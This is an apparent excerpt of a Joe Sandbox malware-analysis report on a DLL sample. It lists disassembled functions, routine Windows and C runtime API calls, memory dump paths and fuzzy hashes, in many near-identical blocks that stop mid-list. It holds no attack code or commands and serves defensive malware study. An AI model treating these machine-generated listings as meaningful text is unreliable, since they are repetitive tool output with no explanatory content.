                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004DE5
                                                                                          • _memmove.LIBCMT ref: 6D004E4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 443534600-4289949731
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+$NameName::
                                                                                          • String ID: throw(
                                                                                          • API String ID: 168861036-3159766648
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6D099880,00000008,6D06EAC1,00000000,00000000,?,?,6D06D7DD,6D069DEF,00000000,?,6D069BD4,6D001290,4E8A916F), ref: 6D06E9CA
                                                                                          • __lock.LIBCMT ref: 6D06E9FE
                                                                                            • Part of subcall function 6D072438: __mtinitlocknum.LIBCMT ref: 6D07244E
                                                                                            • Part of subcall function 6D072438: __amsg_exit.LIBCMT ref: 6D07245A
                                                                                            • Part of subcall function 6D072438: EnterCriticalSection.KERNEL32(6D069BD4,6D069BD4,?,6D06EA03,0000000D), ref: 6D072462
                                                                                          • InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6D06EA0B
                                                                                          • __lock.LIBCMT ref: 6D06EA1F
                                                                                          • ___addlocaleref.LIBCMT ref: 6D06EA3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                          • String ID: KERNEL32.DLL
                                                                                          • API String ID: 637971194-2576044830
                                                                                          • Opcode ID: cf9781711006619d5b1412aaf2f6e3ab48ccd0e72936381daca79c510162d7ad
                                                                                          • Instruction ID: e0039bb85fd84624bd18c5bdd9d03d7b4b63968c4a4116d415310a07b8f215e4
                                                                                          • Opcode Fuzzy Hash: cf9781711006619d5b1412aaf2f6e3ab48ccd0e72936381daca79c510162d7ad
                                                                                          • Instruction Fuzzy Hash: 75016171449B409EEB20DF65D804749FBF4FF51319F20890DD599976A1CB74A640CB25
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6D01E29B
                                                                                          • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6D01E2B6
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D01E2D7
                                                                                            • Part of subcall function 6D025760: std::tr1::_Xweak.LIBCPMT ref: 6D025769
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D01E309
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01E523
                                                                                          • InterlockedCompareExchange.KERNEL32(6D0AC6A4,45524548,4B4F4F4C), ref: 6D01E544
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 2722669376-0
                                                                                          • Opcode ID: af73010d16bec74a937a3444803de99ed5cf74d593be61c5109ee07fb8a07ed9
                                                                                          • Instruction ID: f5691703ee2b62e366454d05ea00d997c948df5671c7db92c26371bfb62870c3
                                                                                          • Opcode Fuzzy Hash: af73010d16bec74a937a3444803de99ed5cf74d593be61c5109ee07fb8a07ed9
                                                                                          • Instruction Fuzzy Hash: D2D1A075A082069FFB11CFE4CC84BAE77F9AF45304F158569EA05EB281E774E940CBA1
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 2bd0391f5e21538758fc9921b54425b5cd5c035cce26f35e3cfb9162d1124d3c
                                                                                          • Instruction ID: ac6da2f6f23e56582bd52169f25577643377528229d1f8598ab84486bba9cfdc
                                                                                          • Opcode Fuzzy Hash: 2bd0391f5e21538758fc9921b54425b5cd5c035cce26f35e3cfb9162d1124d3c
                                                                                          • Instruction Fuzzy Hash: EA412974A016199FEB00DFA9CD80F6AB7FAAF89310F60858AE519DB355DB31E841CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c89270e79801b86937f1a42f52ebec801e7dfbe192bd25961ae1e0986cec56db
                                                                                          • Instruction ID: 918e33820898e8dca575cfa73b526b8a565ea11bf546845d9ac3aa0e4cd7545d
                                                                                          • Opcode Fuzzy Hash: c89270e79801b86937f1a42f52ebec801e7dfbe192bd25961ae1e0986cec56db
                                                                                          • Instruction Fuzzy Hash: EC415B74A016199FEF00DF68CC80F6EB7F9AF89210F60859AE518E7255CB31E941CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c89270e79801b86937f1a42f52ebec801e7dfbe192bd25961ae1e0986cec56db
                                                                                          • Instruction ID: 197c81bdf64cc6264378c7df4a774ca83b8098539733f3e00ecf8bed52b0bb6e
                                                                                          • Opcode Fuzzy Hash: c89270e79801b86937f1a42f52ebec801e7dfbe192bd25961ae1e0986cec56db
                                                                                          • Instruction Fuzzy Hash: 50415D70A016099FEB10CFA9CD80FADB7F9AF89200F60859AE518EB251CB31DA41CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: baaf95ec3722bc6aa900360c7d1a69234a4b33ea703c6278f3474275c04034ff
                                                                                          • Instruction ID: baaee5cc51f08177019295a53ce79c7eb9d161dc168d9cfe2f35ee686b57f133
                                                                                          • Opcode Fuzzy Hash: baaf95ec3722bc6aa900360c7d1a69234a4b33ea703c6278f3474275c04034ff
                                                                                          • Instruction Fuzzy Hash: 99313970E016199FEB00CFA8CD80F6EB7FAAF89210F608696E519E7255CB75E941CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: b62d28c31f3ad2e1328d2aa32b39386efdb9b4d3bfea488bc891bcb2eb3b6b73
                                                                                          • Instruction ID: 73b3dd4bc63c2712a53899147bf1177d842f8c88c82b84c0fdc3c65a0a743ce4
                                                                                          • Opcode Fuzzy Hash: b62d28c31f3ad2e1328d2aa32b39386efdb9b4d3bfea488bc891bcb2eb3b6b73
                                                                                          • Instruction Fuzzy Hash: 96312770E016099FEB00DFA9CC80F6EB7FAAF89210F60858AE519E7251CB75ED418F50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: fa8eb19020fa8fa827918e6b3c57201c7ac2651f0ad79109da24107518f1c9b9
                                                                                          • Instruction ID: 68de827ab1a57d552f69dc5299a08e21c647ebdcbe94de75f4acbbf088ddcb22
                                                                                          • Opcode Fuzzy Hash: fa8eb19020fa8fa827918e6b3c57201c7ac2651f0ad79109da24107518f1c9b9
                                                                                          • Instruction Fuzzy Hash: 13313974E016099FEB10DF68CC80F6EB7FAAF89210F60858AE519E7255CB75E941CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c053a5bf3146faa44cbb865e1cd055a213cea6be0a031b7b3012cdf2d688a725
                                                                                          • Instruction ID: e289176af79469cb5f555f617621bc8f64d34c1300c869da222c7e553981afb9
                                                                                          • Opcode Fuzzy Hash: c053a5bf3146faa44cbb865e1cd055a213cea6be0a031b7b3012cdf2d688a725
                                                                                          • Instruction Fuzzy Hash: B9314B70E016199FEB10CFA9CD80B6EB7FAAF89200F20858AE518EB251D771DA40CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: b62d28c31f3ad2e1328d2aa32b39386efdb9b4d3bfea488bc891bcb2eb3b6b73
                                                                                          • Instruction ID: 043cc1a4df7189c936b672f61cd62eee917d10cfd695ba7186c6bde9fd00d94a
                                                                                          • Opcode Fuzzy Hash: b62d28c31f3ad2e1328d2aa32b39386efdb9b4d3bfea488bc891bcb2eb3b6b73
                                                                                          • Instruction Fuzzy Hash: BD313C70E116199FDB10CFA9CD80B6EB7F9AF89300F608586E518EB251CB75DA418F50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 4026d9119d739d8b37661477839c34a6c599b3e6db52b317be686f26508b0676
                                                                                          • Instruction ID: 78225d97f64410b1daf482ada86b17729c11aea6474100d301135b2454eafd33
                                                                                          • Opcode Fuzzy Hash: 4026d9119d739d8b37661477839c34a6c599b3e6db52b317be686f26508b0676
                                                                                          • Instruction Fuzzy Hash: C3313E70E116199FDB10CFA9CD80B6EB7F9AF89300F60859AE518EB251CB71DA41CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 4026d9119d739d8b37661477839c34a6c599b3e6db52b317be686f26508b0676
                                                                                          • Instruction ID: dfe1822f6e12dc40fec7d7312b72fd0d431e3cfbd0a832c5db69d9e23a8b6492
                                                                                          • Opcode Fuzzy Hash: 4026d9119d739d8b37661477839c34a6c599b3e6db52b317be686f26508b0676
                                                                                          • Instruction Fuzzy Hash: B5314970E016099FEB00CF69CC80F6EB7F9AF89210F60859AE519E7251CB75E941CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: dd0db5746f6a265b5dbedada8c8bc31ad62cee56b061d545268d9436674e231f
                                                                                          • Instruction ID: 6ae69e309a028229d8c918921bcfde5664e880027cd096b334ef9282a8e3a654
                                                                                          • Opcode Fuzzy Hash: dd0db5746f6a265b5dbedada8c8bc31ad62cee56b061d545268d9436674e231f
                                                                                          • Instruction Fuzzy Hash: 01314870E016099FEB00CFA9CD80F6EB7FAAF89210F20858AE519E7251CB75E941CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c053a5bf3146faa44cbb865e1cd055a213cea6be0a031b7b3012cdf2d688a725
                                                                                          • Instruction ID: aeb68c3e2c077430e17ff1da57800e140ccfb2c719b90e554f504f8cd9dd81a7
                                                                                          • Opcode Fuzzy Hash: c053a5bf3146faa44cbb865e1cd055a213cea6be0a031b7b3012cdf2d688a725
                                                                                          • Instruction Fuzzy Hash: F7314870E016199FEB00CFA8CC80F6EB7FAAF89210F20858AE518E7251DB75E941CF50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 98dc322c9365b7129cac3559b6f25e14a120a14eef896f4fb8c59f4ff174e993
                                                                                          • Instruction ID: 8baf4f5f9da4ade22e6236041eb780b56e19faec68072a506d7b4a95cd74abb6
                                                                                          • Opcode Fuzzy Hash: 98dc322c9365b7129cac3559b6f25e14a120a14eef896f4fb8c59f4ff174e993
                                                                                          • Instruction Fuzzy Hash: 2B312770E016199FEB00DFA8CC80F6EB7FAAF89210F60858AE519E7251CB75E9418F50
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 16a75d97aed0fef88708f5aa9457d792e8cb1a7564698deb7386da263a801229
                                                                                          • Instruction ID: a9c7c02e9e7e9707b44c5a3c1034b94351113621f4cc74786b2f446ec661bb1e
                                                                                          • Opcode Fuzzy Hash: 16a75d97aed0fef88708f5aa9457d792e8cb1a7564698deb7386da263a801229
                                                                                          • Instruction Fuzzy Hash: 3D312870E016199FEB00DBA8CC80F6EB7FAAF89210F208586E519E7251CB75E941CF50
                                                                                          APIs
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C180
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,6D023749,?), ref: 6D02C1B8
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C1C4
                                                                                          • VariantCopy.OLEAUT32(6D023749,?), ref: 6D02C21B
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C22F
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02C23E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 3979206172-0
                                                                                          • Opcode ID: cc3e397e55a881c6f5d10454a59b8601dfefb7d7a1e08c33c81fe209c0ca6a9d
                                                                                          • Instruction ID: 0d5853040ce633a852eccba580a4b440dfcbeb56478b2448cf0031e7741f6e51
                                                                                          • Opcode Fuzzy Hash: cc3e397e55a881c6f5d10454a59b8601dfefb7d7a1e08c33c81fe209c0ca6a9d
                                                                                          • Instruction Fuzzy Hash: D2314C75A04209AFDF00DFA8C895BAEBBB9EF5E301F108529E916D7350EB35D905CB60
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6D0811FD,000000FF,?,6D018B80,00000000,?,00000000,?,6D018C13,?,?), ref: 6D017415
                                                                                          • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6D0811FD,000000FF,?,6D018B80,00000000,?,00000000,?,6D018C13,?,?), ref: 6D01741B
                                                                                          • std::exception::exception.LIBCMT ref: 6D01743D
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D017452
                                                                                          • std::exception::exception.LIBCMT ref: 6D017461
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D017476
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
